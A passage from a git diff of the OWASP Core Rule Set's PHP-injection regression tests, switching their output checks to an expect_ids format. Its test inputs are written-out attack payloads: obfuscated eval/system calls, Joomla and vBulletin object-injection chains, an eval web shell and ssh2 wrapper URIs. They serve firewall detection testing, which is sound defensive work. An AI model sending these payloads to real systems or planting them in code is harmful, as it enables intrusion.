expect_ids: [933160] - test_id: 7 desc: | PHP function call using Error Control Operator. @@ -123,7 +129,8 @@ tests: uri: "/get?foo=%40exec%28%27test%27%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 8 desc: | PHP function call with vertical tab. @@ -140,7 +147,8 @@ tests: uri: "/get?foo=exec%09%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 9 desc: | PHP function call with comment and newline. @@ -157,7 +165,8 @@ tests: uri: "/get?foo=exec%20%2f%2fcomment%0d%0a%20%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 10 desc: | PHP function call with comment and newline. @@ -174,7 +183,8 @@ tests: uri: "/get?foo=exec%20%23comment%0d%0a%20%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 11 desc: | PHP function call with comment and newline. @@ -191,7 +201,8 @@ tests: uri: "/get?foo=exec%23%0a%20%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 12 desc: | PHP function call with comment, newline, and vertical tab. @@ -208,7 +219,8 @@ tests: uri: "/get?foo=exec%20%09%20%23%0a%20%28%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 13 desc: | PHP function call with c-style comment syntax. @@ -225,7 +237,8 @@ tests: uri: "/get?foo=exec%2f%2acomment%2a%2f%28%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 14 desc: | PHP function call with c-style comment syntax and whitespaces. @@ -242,7 +255,8 @@ tests: uri: "/post?foo=exec%20%2f%2acomment%2a%2f%20%28%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 15 desc: | PHP function call with empry c-style comment syntax, whitespaces, and vertical tab. @@ -259,7 +273,8 @@ tests: uri: "/get?foo=exec%20%09%2f%2a%2a%2f%09%20%28%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 16 desc: | PHP function call with c-style comment syntax containing newline, whitespaces and vertical tab. @@ -276,7 +291,8 @@ tests: uri: "/get?foo=exec%09%2f%2afoo%0d%0abar%2a%2f%09%20%28%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 17 desc: | PHP function call in URI @@ -293,7 +309,8 @@ tests: uri: "/get/substr()" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 18 desc: | PHP function call in URI, using mixed case @@ -310,7 +327,8 @@ tests: uri: "/post/subSTR%28%24x%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 19 desc: | PHP function call in URI with concatenated string/functions @@ -327,7 +345,8 @@ tests: uri: "/get?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 20 desc: | PHP function call in URI @@ -344,7 +363,8 @@ tests: uri: '/get/eval(gzinflate(str_rot13(base64_decode("")' version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 21 desc: | PHP function call in URI, base64 encoded payload: @@ -361,7 +381,8 @@ tests: uri: "/get/eval%28base64_decode%28%27cGFwYWRhcHVwaSwK%27%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 22 desc: | PHP function call in body @@ -379,7 +400,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 23 desc: | PHP function call in body, mixed case @@ -397,7 +419,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 24 desc: string function call stages: @@ -412,7 +435,8 @@ tests: uri: "/get?foo=return%22system%22%28xyz%29.s" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 25 desc: | PHP function call @@ -430,7 +454,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 26 desc: | PHP function call @@ -448,7 +473,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 27 desc: | PHP function system call in single quotes and parentheses @@ -466,7 +492,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 28 desc: | PHP system call in double quotes and parentheses @@ -484,7 +511,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 29 desc: | PHP system call in double quotes and parentheses, multiple spaces after command @@ -502,7 +530,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 30 desc: | PHP string function call @@ -519,7 +548,8 @@ tests: uri: "/get?foo=return%22system%22%28xyz%29.s" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 31 desc: | False Positive test, missing mandatory parenthesis @@ -536,7 +566,8 @@ tests: uri: "/get/eval(" version: "HTTP/1.1" output: - no_log_contains: id "933160" + log: + no_expect_ids: [933160] - test_id: 32 desc: | False Positive test, missing mandatory parenthesis @@ -553,7 +584,8 @@ tests: uri: "/get?foo=eval" version: "HTTP/1.1" output: - no_log_contains: id "933160" + log: + no_expect_ids: [933160] - test_id: 33 desc: | False Positive test @@ -570,7 +602,8 @@ tests: uri: "/get?foo=the%20files%20%28yep%29" version: "HTTP/1.1" output: - no_log_contains: id "933160" + log: + no_expect_ids: [933160] - test_id: 34 desc: | PHP mixed case function call with space, LF between (). @@ -587,7 +620,8 @@ tests: uri: "/get?foo=assert_OptionS%20%28%0A%0A%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 35 desc: | PHP function call `filegroup` with multiple whitespaces. @@ -604,7 +638,8 @@ tests: uri: "/get?foo=filegroup%20%20%28blah%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 36 desc: | PHP function call in URI @@ -621,7 +656,8 @@ tests: uri: "/get/unpack()" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] - test_id: 37 desc: | PHP function call in URI, using mixed case @@ -638,4 +674,5 @@ tests: uri: "/post/unPACK%28%24x%29" version: "HTTP/1.1" output: - log_contains: id "933160" + log: + expect_ids: [933160] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml index f59a24858..cb9af4ed2 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml @@ -18,7 +18,8 @@ tests: uri: "/post?%20checkDate%28%29" version: "HTTP/1.1" output: - log_contains: id "933161" + log: + expect_ids: [933161] - test_id: 2 desc: regexp; must run test in PL3! stages: @@ -34,7 +35,8 @@ tests: uri: "/post?foo=chroot%09%28%29" version: "HTTP/1.1" output: - log_contains: id "933161" + log: + expect_ids: [933161] - test_id: 3 desc: symlink \t() stages: @@ -50,24 +52,27 @@ tests: uri: "/post?foo=symlink%09%28%29" version: "HTTP/1.1" output: - log_contains: id "933161" + log: + expect_ids: [933161] + # See https://github.com/coreruleset/coreruleset/issues/3693 # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075 # - test_id: 4 # desc: dl/*foo*/() # stages: - # - input: - # data: gethostbynamE( - # dest_addr: 127.0.0.1 - # headers: - # Host: localhost - # User-Agent: "OWASP CRS test agent" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # method: POST - # port: 80 - # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" - # version: "HTTP/1.1" - # output: - # log_contains: id "933161" + # - input: + # data: gethostbynamE( + # dest_addr: 127.0.0.1 + # headers: + # Host: localhost + # User-Agent: "OWASP CRS test agent" + # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # method: POST + # port: 80 + # uri: "/post?foo=dl%2F%2Afoo%2A%2F%09%28%29" + # version: "HTTP/1.1" + # output: + # log: + # expect_ids: [933161] - test_id: 5 desc: ucfirst() stages: @@ -83,4 +88,5 @@ tests: uri: "/post?foo=xucfirst%28%29" version: "HTTP/1.1" output: - no_log_contains: id "933161" + log: + no_expect_ids: [933161] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml index 499134b90..e8dc30535 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml @@ -17,7 +17,8 @@ tests: uri: "/get/serialize0?foo=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 2 desc: PHP object injection stages: @@ -32,7 +33,8 @@ tests: uri: "/get/serialize1?foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 3 desc: PHP object injection stages: @@ -48,7 +50,8 @@ tests: uri: "/post/serialize2" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 4 desc: PHP object injection stages: @@ -64,7 +67,8 @@ tests: uri: "/post/serialize3?foo=O%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A2%3A%22fc%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A8%3A%22feed_url%22%3Bs%3A119%3A%22eval%28chr%28112%29.chr%28104%29.chr%28112%29.chr%28105%29.chr%28110%29.chr%28102%29.chr%28111%29.chr%2840%29.chr%2841%29.chr%2859%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%22%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A11%3A%22cache_class%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7D%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bb%3A1%3B%7D" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 5 desc: PHP object injection stages: @@ -80,7 +84,8 @@ tests: uri: "/post/serialize4/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 6 desc: PHP object injection stages: @@ -96,7 +101,8 @@ tests: uri: "/post/serialize5?O%3A8%3A%22stdClass%22%3A4%3A%7Bs%3A3%3A%22aaa%22%3Ba%3A5%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bi%3A2%3Bi%3A2%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Di%3A3%3Bi%3A4%3Bi%3A4%3Bi%3A5%3B%7Ds%3A3%3A%22aaa%22%3Bi%3A1%3Bs%3A3%3A%22ccc%22%3BR%3A5%3Bs%3A3%3A%22ddd%22%3Bs%3A4%3A%22AAAA%22%3B%7D" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 7 desc: PHP object injection stages: @@ -112,7 +118,8 @@ tests: uri: "/post/serialize6" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 8 desc: PHP object injection stages: @@ -128,7 +135,8 @@ tests: uri: "/post/serialize7" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 9 desc: PHP object injection stages: @@ -144,7 +152,8 @@ tests: uri: "/post/serialize8" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] - test_id: 10 desc: PHP object injection stages: @@ -160,4 +169,5 @@ tests: uri: "/post/serialize9" version: "HTTP/1.1" output: - log_contains: id "933170" + log: + expect_ids: [933170] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index 4e685ebfd..b2f79f0ca 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?x=" version: "HTTP/1.1" output: - no_log_contains: id "933180" + log: + no_expect_ids: [933180] - test_id: 2 desc: $a(1) stages: @@ -32,7 +33,8 @@ tests: data: 'foo=%24a%281%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 3 desc: $$b(2) stages: @@ -47,7 +49,8 @@ tests: data: 'foo=%24%24b%282%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 4 desc: $_(3) stages: @@ -62,7 +65,8 @@ tests: data: 'foo=%24_%283%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 5 desc: '@$__[o](4)' stages: @@ -77,7 +81,8 @@ tests: data: 'foo=%40%24__%5Bo%5D%284%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 6 desc: $__['o'](5) stages: @@ -92,7 +97,8 @@ tests: data: 'foo=%24__%5B%27o%27%5D%285%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 7 desc: $__[@o](6) stages: @@ -107,7 +113,8 @@ tests: data: 'foo=%24__%5B%40o%5D%286%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 8 desc: $__[$_[1]](7) stages: @@ -122,7 +129,8 @@ tests: data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 9 desc: $__[@$c](8) stages: @@ -137,7 +145,8 @@ tests: data: 'foo=%24__%5B%40%24c%5D%288%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 10 desc: $d['o'](9) stages: @@ -152,7 +161,8 @@ tests: data: '%24d%5B%27o%27%5D%289%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 11 desc: ${@a}(10) stages: @@ -167,7 +177,8 @@ tests: data: 'foo=%24%7B%40a%7D%2810%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 12 desc: ${'a'}(11) stages: @@ -182,7 +193,8 @@ tests: uri: "/get?foo=%24%7B%27a%27%7D%2811%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 13 desc: ${@$b}(12) stages: @@ -197,7 +209,8 @@ tests: uri: "/get?x=%24%7B%40%24b%7D%2812%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 14 desc: ${$s20}['q53b3a6'](13) stages: @@ -212,7 +225,8 @@ tests: data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 15 desc: $GLOBALS['cf908275'](14) stages: @@ -227,7 +241,8 @@ tests: data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 16 desc: $OOO000000{0}(15) stages: @@ -242,7 +257,8 @@ tests: data: 'c=%24OOO000000%7B0%7D%2815%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 17 desc: $OOO0000O0 (16) stages: @@ -257,7 +273,8 @@ tests: uri: "/get?x=%24OOO0000O0%20%2816%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 18 desc: $_aB_4c[5]['d'] /*lol*/ (17) stages: @@ -272,7 +289,8 @@ tests: uri: "/get?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 19 desc: $_aB_4c[@5]/*wat*/[@d] (18) stages: @@ -287,7 +305,8 @@ tests: data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 20 desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19) stages: @@ -302,7 +321,8 @@ tests: data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 21 desc: $___[@-_](20) stages: @@ -317,7 +337,8 @@ tests: uri: "/get?x=%24___%5B%40-_%5D%2820%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 22 desc: '@$___[@!+_](21)' stages: @@ -332,7 +353,8 @@ tests: uri: "/get?x=%40%24___%5B%40%21%2B_%5D%2821%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 23 desc: $b374k=@$s_func(22) stages: @@ -347,7 +369,8 @@ tests: data: 'foo=%24b374k%3D%40%24s_func%2822%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 24 desc: $function\r\n (23) stages: @@ -362,7 +385,8 @@ tests: data: 'foo=%24function%0D%0A%20%2823%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 25 desc: $__[_](24) stages: @@ -377,7 +401,8 @@ tests: uri: "/get?x=%24__%5B_%5D%2824%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 26 desc: $____[_]{_}[@_](25) stages: @@ -392,7 +417,8 @@ tests: uri: "/get?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 27 desc: multiline with comments stages: @@ -407,7 +433,8 @@ tests: data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 28 desc: $$$z(29) stages: @@ -422,7 +449,8 @@ tests: uri: "/get?x=%24%24%24z%2829%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 29 desc: ${_.__}(30); stages: @@ -437,7 +465,8 @@ tests: uri: "/get?x=%24%7B_.__%7D%2830%29%3B" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 30 desc: $ {@_.__}(31); stages: @@ -452,7 +481,8 @@ tests: uri: "/get?x=%24%20%7B%40_.__%7D%2831%29%3B" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 31 desc: $_[@-_]($_[@!+_] ) stages: @@ -467,7 +497,8 @@ tests: uri: "/get?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 32 desc: $f(101).$f(120) stages: @@ -482,7 +513,8 @@ tests: uri: "/get?x=%24f%28101%29.%24f%28120%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 33 desc: '@$b374k("foo")' stages: @@ -497,7 +529,8 @@ tests: uri: "/get?x=%40%24b374k%28%22foo%22%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 34 desc: ${$foo->bar}(200) stages: @@ -512,7 +545,8 @@ tests: uri: "/get?x=%24%7B%24foo-%3Ebar%7D%28200%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 35 desc: $foo->$funcname() stages: @@ -527,7 +561,8 @@ tests: data: '%24foo-%3E%24funcname%28%29' version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] - test_id: 36 desc: Foo::$variable() stages: @@ -542,4 +577,5 @@ tests: uri: "/get?x=Foo%3A%3A%24variable%28%29" version: "HTTP/1.1" output: - log_contains: id "933180" + log: + expect_ids: [933180] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml index 454d8a0d3..21a4dc9b3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml @@ -19,4 +19,5 @@ tests: data: 'file_test=<?php%20@eval($_POST["hacker"]);%20?>&submit=1' version: HTTP/1.1 output: - log_contains: id "933190" + log: + expect_ids: [933190] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml index 0b84ff9d4..e46e9c1c8 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml @@ -17,7 +17,8 @@ tests: uri: "/get/test.php?file=phar://phpinfo.zip/phpinfo.txt" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 2 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)" stages: @@ -32,7 +33,8 @@ tests: uri: "/get/test.php?file=compress.bzip2://file.bz2" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 3 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)" stages: @@ -47,7 +49,8 @@ tests: uri: "/get/test.php?file=compress.zlib://http://www.example.com/some_file.gz" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 4 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)" stages: @@ -62,7 +65,8 @@ tests: uri: "/get/test.php?file=zip://archive.zip" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 5 desc: "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)" stages: @@ -77,7 +81,8 @@ tests: uri: "/get/test.php?file=lz77://some_file.lz" version: HTTP/1.1 output: - no_log_contains: id "933200" + log: + no_expect_ids: [933200] - test_id: 6 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)" stages: @@ -92,7 +97,8 @@ tests: uri: "/get/test.php?file=ssh2.shell://user:password@example.com:22/xterm" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 7 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)" stages: @@ -107,7 +113,8 @@ tests: uri: "/get/test.php?file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 8 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)" stages: @@ -122,7 +129,8 @@ tests: uri: "/get/test.php?file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 9 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)" stages: @@ -137,7 +145,8 @@ tests: uri: "/get/test.php?file=ssh2.sftp://user:password@example.com:22/path/to/filename" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] - test_id: 10 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)" stages: @@ -152,4 +161,5 @@ tests: uri: "/get/test.php?file=ssh2.scp://user:password@example.com:22/path/to/filename" version: HTTP/1.1 output: - log_contains: id "933200" + log: + expect_ids: [933200] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml index 46ba63c95..74a7285e7 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." version: "HTTP/1.1" output: - no_log_contains: id "933210" + log: + no_expect_ids: [933210] - test_id: 2 desc: Check for false positive 2 stages: @@ -33,7 +34,8 @@ tests: uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" version: "HTTP/1.1" output: - no_log_contains: id "933210" + log: + no_expect_ids: [933210] - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: @@ -48,7 +50,8 @@ tests: uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: @@ -78,7 +82,8 @@ tests: uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: @@ -93,7 +98,8 @@ tests: uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: @@ -123,7 +130,8 @@ tests: uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: @@ -138,7 +146,8 @@ tests: uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: @@ -153,7 +162,8 @@ tests: uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: @@ -168,7 +178,8 @@ tests: uri: "/get?x=%28system%29%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: @@ -183,7 +194,8 @@ tests: uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: @@ -198,7 +210,8 @@ tests: uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" version: "HTTP/1.1" output: - log_contains: id "933210" + log: + expect_ids: [933210] - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: @@ -213,7 +226,8 @@ tests: uri: 